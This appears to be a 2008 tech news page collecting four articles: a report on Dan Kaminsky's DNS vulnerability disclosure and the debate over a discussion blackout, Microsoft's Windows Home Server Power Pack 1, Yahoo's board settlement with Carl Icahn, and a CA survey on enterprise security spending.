In a Friday morning press conference, Kaminsky said that many of the patches released by various IT vendors and security firms reacting to his bug discovery (reported by CNet) are at best temporary fixes to a more pervasive problem. Kaminsky added that he would be disclosing further findings at the Black Hat security conference in Las Vegas next month.

Kaminsky argued that there should be a blackout on discourse and research about the vulnerability until then. In contrast, IT security gadfly Halvar Flake, who is also CEO and head of research at Sabre Security, outlined a hypothesis for the DNS flaw in his blog and disagreed with the blackout.

"Let's assume that the DNS problem is sufficiently complicated that an average person that has some background in security, but little idea of protocols or DNS, would take N days to figure out what the problem is. So clearly, the assumption behind the 'discussion blackout' is that no evil person will figure it out before the end of the N days [blackout]," Flake wrote.

Flake's proposed method of finding the vulnerability came about when he ran tests that involved sending spoofed protocol transfer requests to a nameserver, the gatekeeping service that converts text domain names into numeric IP addresses. Through this process, an attacker sets up a Web page with tags that are routed to a corrupt nameserver. When a user visits that Web page, the browser may be fooled into associating a legitimate nameserver with the page.

The DNS vector should be considered a pervasive threat to enterprise systems.

The U.S. Computer Emergency Readiness Team, about two weeks ago -- around the time of Kaminsky's initial announcement -- issued an advisory describing the issue. It listed more than 80 vendors whose products are affected by the vulnerability, including names like Microsoft, Cisco Systems, Sun Microsystems Inc. and Red Hat, among others.

Having a reliable DNS cache exploit in place increases the probability that a hacker can redirect an unsuspecting Web surfer to a malicious Web site, an attack called "phishing."

"Phishing attacks were already on the rise against the increasing number of hosted enterprises services," said Andrew Storms, director of security at San Francisco-based IT security firm nCircle. "I don't think we've seen the last of these problems. The temporary solutions are to immediately patch your system in the meantime because the risk to corporate networks is one of the more serious risks enterprises face."


Tuesday, July 22, 2008

Power Pack 1 Unveiled for Windows Home Server

Microsoft has released to manufacturing its Windows Home Server Power Pack 1 update, which adds additional product support plus a fix for an infamous bug that has plagued Microsoft's consumer server offering since December.

The bug in question, described in knowledgebase article 946676, affected systems using more than one hard disk, causing files saved with the NTFS file system to become corrupted when saved via Windows Home Server (WHS). The problem was associated mostly with Microsoft applications -- a rather embarrassing problem, since WHS is designed, in part, to back up data on a home network.

Power Pack 1 adds support for Windows Vista x64-based PCs, according to Microsoft's announcement. Microsoft has also improved WHS's performance and power consumption with Power Pack 1. The update also enables backups of shared folders and adds improvements to WHS's remote access capabilities.

Microsoft released the English version of Power Pack 1, which is available now here via the Microsoft Download Center. The English version will also be available through Windows Update on August 4, according to the We Got Served blog.

Chinese and Japanese versions of Power Pack 1 will be released to manufacturing sometime in August, according to Microsoft's announcement. French, German and Spanish editions will be available via the Microsoft Download Center on August 4, says the We Got Served blog.

Power Pack 1 can't be used with the beta or release candidate versions of WHS. You have to remove the beta version before applying Power Pack 1, according to Microsoft's description of Power Pack 1.

Some folder and database files are not designed to be used on WHS, according to the We Got Served blog, which points to knowledgebase article 955690 on the topic. Those files include Outlook .pst files, which some use to copy e-mail messages to a local computer. The files are unsupported on a local area network, and so Microsoft recommends not storing them on WHS.

Also, some database files, such as those used in Intuit's Quicken finance program, were designed for use on a single computer. Microsoft's knowledge base says that these kinds of files can get corrupted if stored on WHS.

Microsoft offers a technical brief on backup and restore using WHS, which can be accessed here. There is also an explanation of how to use WHS's remote access capabilities, which can be accessed here.

Microsoft also offers a software developer kit, API reference and developer's guide for WHS, which can be accessed here.


Yahoo Ends Proxy Fight With Icahn

Yahoo partly acceded to the demands of corporate raider Carl Icahn by agreeing to seat Icahn and two of his proxy-slate candidates to Yahoo's board. The about-face move by Yahoo is a surprising turn in the ongoing harsh wooing of the company, which began in January with an unsolicited acquisition proposal from Microsoft.

Icahn, who holds about 5 percent of Yahoo's stock, got involved late in the process, trying to broker a deal between Yahoo's and Microsoft's management teams. Only a week ago, Icahn's efforts drew sharp denunciations from Yahoo's management. Roy Bostock, Yahoo's chairman, called the alliance of Microsoft and Icahn "odd and opportunistic," and rejected a new Icahn-brokered Microsoft offer to buy Yahoo's search business as bad for shareholders.

Icahn could have challenged the whole of Yahoo's board -- all of whom are up for election. However, this latest deal just adds two of Icahn's candidates to the board: Jonathan Miller, a Velocity Interactive Group partner and former AOL chairman and CEO, plus one other candidate from the nine recommended by Icahn. Those two candidates will be seated on the board "upon the recommendation of the Board's Nominating and Governance Committee," according to an announcement issued by Yahoo.

In addition, the board membership will be expanded to 11 members and eight members of the current board will be up for election. A current board member, Robert Kotick, Activision Blizzard's CEO, will not stand for reelection. Yahoo's shareholders are scheduled to elect the board at Yahoo's Aug. 1 shareholders' meeting.

Yahoo's accommodation of Icahn comes just four days after Bostock and Yahoo's CEO Jerry Yang wrote a letter to stockholders calling Icahn "a corporate agitator with a short-term approach to his investments."

The letter also said Icahn had no plan for the company and that "Icahn and his slate lack the working knowledge of Yahoo!"

Icahn had originally supported Yahoo's current plan, to reject the sale to Microsoft and enact a search-ad deal with Google, according to the letter. However, Icahn then did "an extraordinary flip flop" and teamed with Microsoft on a "search-only proposal," the letter claimed.

Icahn has rejected the criticism of his fumbled deal proposal in which "we were willing to discuss keeping a number of the current board members and Jerry Yang as Chief Yahoo!," Icahn wrote in a letter to Yahoo's shareholders.

Microsoft originally offered to buy all of Yahoo -- a deal that company officials called off in late April over a price dispute. Now Microsoft just wants to buy Yahoo's search business to bolster its third-place ranking in search, where it badly trails Google and Yahoo.

Microsoft's latest proposal to buy Yahoo's search-ad business was disclosed in detail on July 18 by Chris Liddell, Microsoft's senior vice president and chief financial officer, in Microsoft's fiscal fourth-quarter report. Liddell described a complex formula in which "Microsoft proposed a 10-year minimum revenue guarantee totaling between $19.5 and $26.5 billion dollars." He also promised "no changes to Yahoo's governance."

So far, there has been no public reaction from Yahoo on Liddell's proposal.


Compliance, New Threats Drive Security Spending

Pity U.S. IT organizations. Not only must they grapple with rising regulatory and compliance costs, but many are coming to grips with another rising cost: security. Enterprise security is an expensive proposition, one that's likely to get even more expensive as organizations take further steps to protect themselves.

The good news, according to a new survey from security software vendor CA Inc., is that all of that money seems to have been well-spent.

CA's latest Security and Identity Access Management (IAM) Survey found an overall decrease in the number of organizations that reported virus, network and denial of service (DoS) attacks last year.

What's more, CA indicated, almost 15 percent of shops said they hadn't experienced (known) attacks of any kind. That's up from 11 percent in 2006.

That figure includes virus outbreaks. Last year, almost 60 percent of enterprises grappled with virus attacks, down from almost 70 percent in 2006. Meanwhile, just 40 percent of U.S. enterprises battled network attacks last year; that's down from half of all shops in 2006.

DoS attacks appear to be on the wane; just over a quarter (26 percent) of organizations were victims of DoS activity in 2007, CA said. That's a steep decline from 2006's tally of 40 percent.

Even as IT organizations have clamped down on traditional attack vectors, they're increasingly coming to grips with another line of attack: breaches from within.

According to CA, the percentage of survey respondents who experienced internal security breaches increased slightly from its 2006 survey, climbing to 44 percent in 2007 (an uptick of 2 percentage points). That's a sharp spike from half-a-decade ago, when less than one-sixth of IT organizations experienced an internal breach.

"The increase of internal threat also appears to be making it more difficult for organizations to successfully manage and contain the costs associated with security attacks/breaches," the CA survey said.

Serious Breaches
The numbers paint a grim picture. In 2007, more than a third of organizations reported losing confidential customer or transactional data as a result of security breaches; that compares with just 22 percent two years ago.

What's more, internal breaches have disastrous real-world consequences, in terms of both costs and irate customers. According to the CA survey, one-third of organizations say they suffered reduced customer satisfaction as a result of breach or attack, while almost two-thirds (61 percent) experienced diminished productivity. This, of course, plays to one of CA's product categories: IAM.

"U.S. businesses and governments recognize it doesn't take much to shake consumer confidence, and they recognize the need to do all they can to assure consumers and constituents," said Lina Liberti, vice president, CA Security Management, in a statement. "As the growth of security threats changes from external attacks [such as] distributed denial of service to the insider threat, businesses are turning to identity and access management solutions to combat that internal threat. This survey indicated that the number of organizations planning to roll out identity and access management solutions in the next 12 to 18 months increased 11 [percentage points], moving from 49 percent in 2006 to 60 percent in 2008."

Increasingly, a majority of organizations are devoting the bulk of their IT spending to security compliance. In 2007, for example, four-fifths of survey respondents reported spending 10 percent or more of their IT budgets on security compliance, while more than half (56 percent) said that their firms spend 20 percent or more of their IT dollars on security compliance.

Over time, security budgets will gobble up an ever-larger share of overall IT spending, according to CA officials.

"The survey points to an increase in the severity of consequences of internal breaches. The implications are now tied squarely to dollars and reputation," Liberti said. "The potential aftershocks of an internal breach [have] the attention of both the business and IT, and for enterprise organizations the priority has now shifted from reactive to proactive security strategies to deal with this threat."
